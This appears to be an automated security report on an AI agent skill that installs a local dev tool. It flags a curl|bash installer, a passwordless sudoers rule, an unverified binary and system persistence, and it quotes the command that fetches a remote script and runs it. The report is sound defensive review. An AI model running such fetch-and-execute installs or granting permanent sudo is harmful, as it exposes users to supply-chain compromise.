Skill Trust Decision
rundev-local-dev
The skill describes a legitimate local dev tool but relies on dangerous curl|bash installation and requires opaque system-level modifications including permanent NOPASSWD sudo access.
Most direct threat evidence
01
User executes curl|bash installation command Entry · SKILL.md
02
Remote server serves potentially malicious install.sh delivery · https://getrun.dev/install.sh
03
Install script executes with sudo privileges, creates NOPASSWD rule Escalation · install.sh (hidden)
Why this conclusion was reached
3/4 dimensions flagged Block
Declared vs actual capability
1 undeclared or violating capabilities were inferred.
Block
Hidden execution and egress
1 high-risk artifacts or egress signals were extracted.
Block
Attack chain and severe findings
The report includes 5 attack-chain steps and 3 severe findings.
Review
Dependencies and supply chain hygiene
Dependency information is incomplete, so supply-chain confidence stays limited.
Attack Chain
01
User executes curl|bash installation command
Entry · SKILL.md:83
02
Remote server serves potentially malicious install.sh
delivery · https://getrun.dev/install.sh:1
03
Install script executes with sudo privileges, creates NOPASSWD rule
Escalation · install.sh (hidden):unknown
04
Binary installed to /usr/local/bin, iptables rules set up, hosts modified
Persistence · install.sh (hidden):unknown
05
Malicious binary with permanent sudo access runs with elevated privileges
Impact · /usr/local/bin/rundev:unknown
What drove the risk score up
Dangerous installation pattern (curl|bash) +25
Line 83: Remote script piped directly to bash - classic supply chain attack vector
Undeclared NOPASSWD sudoers rule +15
Installer creates passwordless sudo rule, not declared as capability violation
Opaque install.sh script +10
Install script contents not visible - hidden functionality risk
Prebuilt binary without verification +5
Binary downloaded from remote URL, no source compilation or checksum verification
Most important evidence
High Supply Chain
Dangerous curl|bash Installation Pattern
Line 83 executes remote script directly from getrun.dev without verification. This is a well-known attack vector where the remote server could serve different content per request, enabling supply chain compromise.
SKILL.md:83 Download the install script first with 'curl -fsSL https://getrun.dev/install.sh -o install.sh', review contents, then execute locally.
High Priv Escalation
Undeclared Permanent Sudoers Rule
The installer creates a NOPASSWD sudoers rule for hosts management. This grants permanent elevated privileges without declaring it as a capability. This rule persists across reboots and could be abused.
SKILL.md:86 Review the sudoers rules installed. Consider using alternative privilege separation or requesting user confirmation for sudo access.
High Doc Mismatch
Hidden Installation Script Contents
The SKILL.md describes what the installer does but the actual install.sh script contents are not visible. Users cannot verify what commands will actually execute, including potential data collection or additional downloads.
SKILL.md:84 Provide the full install.sh script content in the skill documentation for transparency and verification.
Medium Supply Chain
Unverified Prebuilt Binary Download
The installer downloads a prebuilt binary from getrun.dev with no checksum verification. An attacker compromising the domain could serve a malicious binary.
SKILL.md:85 Use the source-based installation: 'git clone && make install' to compile from verified source code.
Medium Persistence
System-Level Persistence Mechanisms
Installer sets up persistent configurations: iptables NAT rules, pfctl anchors, hosts file modifications, and state persistence in state.json. These create multiple persistence vectors.
SKILL.md:86 Document all persistence mechanisms clearly and provide easy uninstall to remove all traces.
Declared capability vs actual capability
Filesystem Pass
Declared WRITE
→ Inferred WRITE
SKILL.md:80-85 - /usr/local/bin, /etc/hosts, ~/.config/rundev/ Shell Pass
Declared WRITE
→ Inferred WRITE
SKILL.md:83 - curl|bash execution Network Block
Declared READ
→ Inferred WRITE
SKILL.md:83 - Downloads binary from getrun.dev Environment Pass
Declared NONE
→ Inferred NONE
No environment access declared or observed Skill Invoke Pass
Declared NONE
→ Inferred NONE
No cross-skill invocation Clipboard Pass
Declared NONE
→ Inferred NONE
No clipboard access Browser Pass
Declared NONE
→ Inferred NONE
No browser automation Database Pass
Declared NONE
→ Inferred NONE
No database access Suspicious artifacts and egress
Critical Dangerous Command
curl -fsSL https://getrun.dev/install.sh | bash SKILL.md:83
Medium External URL
https://getrun.dev SKILL.md:22
Medium External URL
https://getrun.dev/install.sh SKILL.md:83
Medium External URL
https://api.myapp.local SKILL.md:193
Medium External URL
https://docs.anthropic.com/en/docs/claude-code SKILL.md:257
Dependencies and supply chain
There are no structured dependency warnings.
File composition
1 files · 323 lines
Markdown 1 files · 323 lines
Files of concern · 1
SKILL.md Dangerous curl|bash Installation Pattern · Undeclared Permanent Sudoers Rule · Hidden Installation Script Contents · Unverified Prebuilt Binary Download · System-Level Persistence Mechanisms · curl -fsSL https://getrun.dev/install.sh | bash · https://getrun.dev · https://getrun.dev/install.sh · https://api.myapp.local · https://docs.anthropic.com/en/docs/claude-code · [email protected]
Security positives
Full documentation of what the installer does (though script content is hidden)
Includes automatic rollback on failure
Network rules are localhost-only (127.0.0.1)
Explicit consent screen before system changes
Provides uninstall command to reverse all changes
Source code available on GitHub for verification (though not used by default install)